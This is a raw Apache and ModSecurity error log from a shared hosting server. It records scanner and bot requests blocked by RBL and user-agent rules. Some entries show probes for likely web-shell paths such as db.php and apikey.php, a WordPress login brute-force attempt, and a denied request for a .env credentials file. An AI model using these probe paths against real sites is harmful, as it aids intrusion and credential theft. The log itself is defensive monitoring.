[Tue May 26 12:55:51.382781 2026] [autoindex:error] [pid 461618:tid 461834] [client 66.132.195.101:1736] AH01276: Cannot serve directory /home2/azurm42s/test.azurmediatec.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:55:51.824881 2026] [security2:error] [pid 461618:tid 461770] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVK_1yiSlSCHr1fdr2-mwAAAJs"]
[Tue May 26 12:55:52.425904 2026] [fcgid:warn] [pid 461618:tid 461773] (70014)End of file found: [client 66.132.186.171:52386] mod_fcgid: can't get data from http client
[Tue May 26 12:55:53.748738 2026] [security2:error] [pid 461618:tid 461834] [client 74.249.173.207:4653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahVLAVyiSlSCHr1fdr2-2AAAANs"]
[Tue May 26 12:55:54.444599 2026] [security2:error] [pid 461618:tid 461762] [client 85.208.96.212:31856] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVLAlyiSlSCHr1fdr2-7gAAAJM"]
[Tue May 26 12:55:54.444737 2026] [security2:error] [pid 461618:tid 461762] [client 85.208.96.212:31856] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/5/"] [unique_id "ahVLAlyiSlSCHr1fdr2-7gAAAJM"]
[Tue May 26 12:55:54.582005 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLAlyiSlSCHr1fdr2-5wAAAI4"]
[Tue May 26 12:55:55.979204 2026] [security2:error] [pid 461618:tid 461795] [client 74.249.173.207:4620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/xmrlpc.php"] [unique_id "ahVLA1yiSlSCHr1fdr2_DQAAALQ"]
[Tue May 26 12:55:58.507143 2026] [security2:error] [pid 461618:tid 461862] [client 157.20.138.61:63306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLBlyiSlSCHr1fdr2_SwAAAPc"]
[Tue May 26 12:55:58.507301 2026] [security2:error] [pid 461618:tid 461862] [client 157.20.138.61:63306] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLBlyiSlSCHr1fdr2_SwAAAPc"]
[Tue May 26 12:55:58.653390 2026] [security2:error] [pid 461618:tid 461798] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLBlyiSlSCHr1fdr2_SgAAALc"]
[Tue May 26 12:55:59.680295 2026] [security2:error] [pid 461618:tid 461722] [remote 88.198.91.116:46312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVLB1yiSlSCHr1fdr2_bwAA3Gc"]
[Tue May 26 12:55:59.860105 2026] [security2:error] [pid 461618:tid 461759] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLB1yiSlSCHr1fdr2_bAAAAJA"]
[Tue May 26 12:56:00.713973 2026] [security2:error] [pid 461618:tid 461773] [client 47.128.55.244:41958] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "oscpl.co.in"] [uri "/robots.txt"] [unique_id "ahVLCFyiSlSCHr1fdr2_qAAAAJ4"]
[Tue May 26 12:56:02.073733 2026] [security2:error] [pid 461618:tid 461637] [remote 5.42.158.148:44724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVLCVyiSlSCHr1fdr2_ygAAuRI"]
[Tue May 26 12:56:02.151128 2026] [security2:error] [pid 461618:tid 461796] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLCVyiSlSCHr1fdr2_xgAAALU"]
[Tue May 26 12:56:04.160457 2026] [security2:error] [pid 461618:tid 461752] [client 74.249.173.207:4612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/class.php"] [unique_id "ahVLDFyiSlSCHr1fdr3ADAAAAIk"]
[Tue May 26 12:56:05.466148 2026] [security2:error] [pid 461618:tid 461755] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLDVyiSlSCHr1fdr3AKQAAAIw"]
[Tue May 26 12:56:06.213727 2026] [security2:error] [pid 461618:tid 461796] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLDlyiSlSCHr1fdr3AXwAAALU"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1285834&moderation-hash=8f2b10575238d96ad682605ac8878fdf
[Tue May 26 12:56:07.131890 2026] [security2:error] [pid 461618:tid 461847] [client 74.249.173.207:4126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/aw.php"] [unique_id "ahVLD1yiSlSCHr1fdr3AewAAAOg"]
[Tue May 26 12:56:08.580179 2026] [security2:error] [pid 461618:tid 461818] [client 113.191.167.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLEFyiSlSCHr1fdr3AngAAAMs"]
[Tue May 26 12:56:08.977257 2026] [security2:error] [pid 461618:tid 461753] [client 157.20.138.61:63689] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLEFyiSlSCHr1fdr3AuwAAAIo"]
[Tue May 26 12:56:08.977409 2026] [security2:error] [pid 461618:tid 461753] [client 157.20.138.61:63689] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLEFyiSlSCHr1fdr3AuwAAAIo"]
[Tue May 26 12:56:09.358871 2026] [security2:error] [pid 461618:tid 461853] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLEFyiSlSCHr1fdr3AugAAAO4"]
[Tue May 26 12:56:09.852493 2026] [security2:error] [pid 461618:tid 461868] [client 49.13.164.148:50562] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVLEVyiSlSCHr1fdr3AvwAAAP0"], referer: https://thegoodsporting.com
[Tue May 26 12:56:10.222897 2026] [security2:error] [pid 461618:tid 461795] [client 23.226.213.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVLEVyiSlSCHr1fdr3AxQAAALQ"]
[Tue May 26 12:56:10.849550 2026] [security2:error] [pid 461618:tid 461825] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLElyiSlSCHr1fdr3A6gAAANI"]
[Tue May 26 12:56:12.938280 2026] [security2:error] [pid 461618:tid 461658] [remote 136.110.38.51:46994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVLFFyiSlSCHr1fdr3BZgAAqyc"]
[Tue May 26 12:56:12.948497 2026] [security2:error] [pid 461618:tid 461648] [remote 172.104.164.56:50676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVLFFyiSlSCHr1fdr3BZwAAnB0"]
[Tue May 26 12:56:13.061645 2026] [security2:error] [pid 461618:tid 461834] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLFFyiSlSCHr1fdr3BYQAAANs"]
[Tue May 26 12:56:13.378540 2026] [security2:error] [pid 461618:tid 461829] [client 74.249.173.207:4128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahVLFVyiSlSCHr1fdr3BeAAAANY"]
[Tue May 26 12:56:14.824209 2026] [autoindex:error] [pid 461618:tid 461856] [client 198.235.24.28:0] AH01276: Cannot serve directory /home2/debatqhn/workrepublic.debatenigeria.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:56:15.162305 2026] [security2:error] [pid 461618:tid 461763] [client 74.249.173.207:4129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahVLF1yiSlSCHr1fdr3BtQAAAJQ"]
[Tue May 26 12:56:15.280428 2026] [security2:error] [pid 461618:tid 461689] [remote 178.104.164.71:34418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVLF1yiSlSCHr1fdr3BsgABBEY"]
[Tue May 26 12:56:16.087230 2026] [security2:error] [pid 461618:tid 461823] [client 74.249.173.207:4130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/test1.php"] [unique_id "ahVLGFyiSlSCHr1fdr3BzAAAANA"]
[Tue May 26 12:56:17.422148 2026] [authz_core:error] [pid 461618:tid 461856] [client 176.65.139.235:39420] AH01630: client denied by server configuration: /home2/azurm42s/public_html/dolibarrtraining.azurmediatec.com/.env
[Tue May 26 12:56:17.916963 2026] [security2:error] [pid 461618:tid 461828] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLGVyiSlSCHr1fdr3B5gAAANU"]
[Tue May 26 12:56:18.431400 2026] [security2:error] [pid 461618:tid 461838] [client 146.56.204.198:64816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.204.56.146.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "proxuber.com"] [uri "/admin/h-ui/lib/webuploader/0.1.5/server/preview.php"] [unique_id "ahVLGlyiSlSCHr1fdr3CBQAAAN8"]
[Tue May 26 12:56:18.904430 2026] [security2:error] [pid 461618:tid 461765] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLGlyiSlSCHr1fdr3CCAAAAJY"]
[Tue May 26 12:56:19.608562 2026] [security2:error] [pid 461618:tid 461817] [client 157.20.138.61:64053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLG1yiSlSCHr1fdr3CMQAAAMo"]
[Tue May 26 12:56:19.608746 2026] [security2:error] [pid 461618:tid 461817] [client 157.20.138.61:64053] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLG1yiSlSCHr1fdr3CMQAAAMo"]
[Tue May 26 12:56:19.937009 2026] [security2:error] [pid 461618:tid 461746] [remote 20.29.64.60:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVLG1yiSlSCHr1fdr3COAAAk38"], referer: www.google.com
[Tue May 26 12:56:19.969077 2026] [security2:error] [pid 461618:tid 461676] [remote 20.29.64.60:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-plain.php"] [unique_id "ahVLG1yiSlSCHr1fdr3COQAA_zk"], referer: www.google.com
[Tue May 26 12:56:20.246453 2026] [security2:error] [pid 461618:tid 461700] [remote 20.29.64.60:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVLHFyiSlSCHr1fdr3CRwAA5lE"], referer: www.google.com
[Tue May 26 12:56:20.291752 2026] [security2:error] [pid 461618:tid 461674] [remote 20.29.64.60:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/hnkbxhma.php"] [unique_id "ahVLHFyiSlSCHr1fdr3CSQAAujc"], referer: www.google.com
[Tue May 26 12:56:20.424469 2026] [security2:error] [pid 461618:tid 461709] [remote 20.29.64.60:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVLHFyiSlSCHr1fdr3CTQAA4lo"]
[Tue May 26 12:56:20.636752 2026] [security2:error] [pid 461618:tid 461629] [remote 20.29.64.60:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVLHFyiSlSCHr1fdr3CUQAAjAo"]
[Tue May 26 12:56:20.799938 2026] [security2:error] [pid 461618:tid 461733] [remote 20.29.64.60:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVLHFyiSlSCHr1fdr3CWAAAuHI"]
[Tue May 26 12:56:20.886439 2026] [security2:error] [pid 461618:tid 461703] [remote 20.29.64.60:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVLHFyiSlSCHr1fdr3CWwAA_VQ"]
[Tue May 26 12:56:21.563372 2026] [security2:error] [pid 461618:tid 461844] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLHVyiSlSCHr1fdr3CYgAAAOU"]
[Tue May 26 12:56:23.926129 2026] [security2:error] [pid 461618:tid 461864] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLH1yiSlSCHr1fdr3CrAAAAPk"]
[Tue May 26 12:56:26.396237 2026] [security2:error] [pid 461618:tid 461682] [remote 209.38.251.46:34250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.251.38.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVLIlyiSlSCHr1fdr3C7wAAoj8"]
[Tue May 26 12:56:26.968440 2026] [security2:error] [pid 461618:tid 461867] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLIlyiSlSCHr1fdr3DAQAAAPw"]
[Tue May 26 12:56:28.663159 2026] [security2:error] [pid 461618:tid 461756] [client 185.191.171.18:30956] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVLJFyiSlSCHr1fdr3DNgAAAI0"]
[Tue May 26 12:56:28.663296 2026] [security2:error] [pid 461618:tid 461756] [client 185.191.171.18:30956] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVLJFyiSlSCHr1fdr3DNgAAAI0"]
[Tue May 26 12:56:30.013780 2026] [security2:error] [pid 461618:tid 461853] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLJVyiSlSCHr1fdr3DTgAAAO4"]
[Tue May 26 12:56:30.195726 2026] [security2:error] [pid 461618:tid 461859] [client 157.20.138.61:64414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLJlyiSlSCHr1fdr3DYQAAAPQ"]
[Tue May 26 12:56:30.195830 2026] [security2:error] [pid 461618:tid 461859] [client 157.20.138.61:64414] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLJlyiSlSCHr1fdr3DYQAAAPQ"]
[Tue May 26 12:56:32.016660 2026] [security2:error] [pid 461618:tid 461817] [client 193.228.128.76:39231] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "jetstarprojects.com"] [uri "/robots.txt"] [unique_id "ahVLKFyiSlSCHr1fdr3DnwAAAMo"]
[Tue May 26 12:56:32.065240 2026] [security2:error] [pid 461618:tid 461875] [client 202.76.174.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLJ1yiSlSCHr1fdr3DmwAAAQQ"]
[Tue May 26 12:56:32.731636 2026] [security2:error] [pid 461618:tid 461830] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLKFyiSlSCHr1fdr3DqwAAANc"]
